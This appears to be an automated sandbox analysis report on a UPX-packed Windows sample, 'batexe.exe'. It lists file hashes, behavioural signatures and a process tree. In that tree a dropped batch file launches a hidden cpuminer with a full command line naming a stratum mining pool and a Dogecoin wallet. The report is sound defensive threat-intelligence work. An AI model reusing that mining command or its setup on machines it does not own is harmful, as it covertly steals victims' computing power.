Analysis

  • max time kernel
    300s
  • max time network
    304s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    18-02-2024 16:08

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 6 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2444
    • C:\Users\Admin\AppData\Local\Temp\2F1A.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\2F1A.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2F1A.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4780
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3B8D.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3620
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:452

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\2F1A.tmp\b2e.exe

    Filesize

    8.8MB

    MD5

    f97fbb2bbead008ef1946c3546ac851a

    SHA1

    dfa427b8cc445c026671ecbe92a5c5c446349cd4

    SHA256

    8c6535212b473aee4193472c6aae479ab99d2c5b2cb1d12998df76c0bab1b1c0

    SHA512

    cbd668e8a6a28db3a0769cae1a39886c3c381d659626c41a17125376d1aa2be0bd93daef3fbe18b4e9d50588e7b95e4584a07f9a00bc632c5c04cb5e3f883a33

  • C:\Users\Admin\AppData\Local\Temp\2F1A.tmp\b2e.exe

    Filesize

    5.6MB

    MD5

    31d8a281d96ba0b4b29364786850b885

    SHA1

    8aa0841d54a39f179de323a0be479bb5e238eae5

    SHA256

    343fea782ab15b8b0f9230222a553a8d70d784ad165fccaf041630521a8ee124

    SHA512

    f367038657ef5d457446c4b6fe16de1153950fd0fe9ec6de25c1a8e63c7a0d4ea24e4bdc21910f22034ea99af84b8f3cc1ce1a73ad537f9ca475038f258c7906

  • C:\Users\Admin\AppData\Local\Temp\2F1A.tmp\b2e.exe

    Filesize

    4.1MB

    MD5

    15c4be7bf9c5faeda4e6f2b163b42e28

    SHA1

    1e1d2c590df07472653133d144658fc5db8c46c3

    SHA256

    f922fdea13800738b93fce44e76b459c5bdb64832f6c2fe2cc8368eb6915b383

    SHA512

    44bf4ab059b0f13d0fab60428a72c2d321d04e5dda7fe54cdc8018e00526bc51c0aca26005f55ebc76dbe64ab4f86b2731e6270db36dff7957f28c7fa18ce7c1

  • C:\Users\Admin\AppData\Local\Temp\3B8D.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    2.0MB

    MD5

    bf7b9096171e5ec89597f4353cffa725

    SHA1

    872d05921094efb3df92d3fc4f43f83b24655df4

    SHA256

    ebf6abead0bf02c21f7a0b4e139f002ebc2371f5e78f05ca0a02adb033b7cba0

    SHA512

    53ee5cb3b6adbab6b1b23ceeb1a2c0ee8dc13f01e9cd6e682a8851f5039a28521d6f6bdd028ab2dc63d143e5bcdb3fdd94d93a049afa6409bbead5e93f6863cf

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    2.3MB

    MD5

    4c04147c386ba8792ac6a03069572a8a

    SHA1

    dda67789fc1d0f2469ca95f01a5c81034853ca6a

    SHA256

    c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

    SHA512

    a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    836KB

    MD5

    aeab40ed9a8e627ea7cefc1f5cf9bf7a

    SHA1

    5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

    SHA256

    218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

    SHA512

    c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    1.2MB

    MD5

    7cf672bee2afba2dcd0c031ff985958e

    SHA1

    6b82a205db080ffdcb4a4470fce85a14413f3217

    SHA256

    c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

    SHA512

    3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    2.0MB

    MD5

    f21be9eb79089edea2d9bd8ef121fb89

    SHA1

    5438ae78f3bdeb324cd93096097ca3fde8eb5253

    SHA256

    f6858d12fcabeb0e1b0eff852b76d0c4ac00a9e9b08149b58a64931d4987121f

    SHA512

    ace0dbd25fd57e16122742eb665203b80d03a5ef99e5cfcce019c48acba0317519220f694b72b8b899fed702bac92d6d2925f133541b565ce55af8e2fd8274b1

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    2.2MB

    MD5

    c93b69d5a8ac23dffaaf3562c8fe5fed

    SHA1

    e6ca0290301abb0f878bcb020a73b7624ed7911c

    SHA256

    03fd05420db8aab160b36ff210a50eff665cf6dd2b603bfeac251c8226bd9fea

    SHA512

    e5572c79eb581bc8f85d5e1092c72a7aa7cdbe33933eab2b3e2d332d195ece55c8c92525af01b628477a45935a3eaed2a612ec68bcef339c126e14eaa2ca7d44

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • memory/452-45-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/452-76-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/452-101-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/452-86-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/452-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

    Filesize

    24.7MB

  • memory/452-47-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/452-48-0x0000000000870000-0x000000000092C000-memory.dmp

    Filesize

    752KB

  • memory/452-49-0x0000000065FD0000-0x0000000066068000-memory.dmp

    Filesize

    608KB

  • memory/452-50-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/452-81-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/452-56-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/452-61-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/452-71-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/452-42-0x0000000000870000-0x000000000092C000-memory.dmp

    Filesize

    752KB

  • memory/2444-9-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

  • memory/4780-55-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/4780-7-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB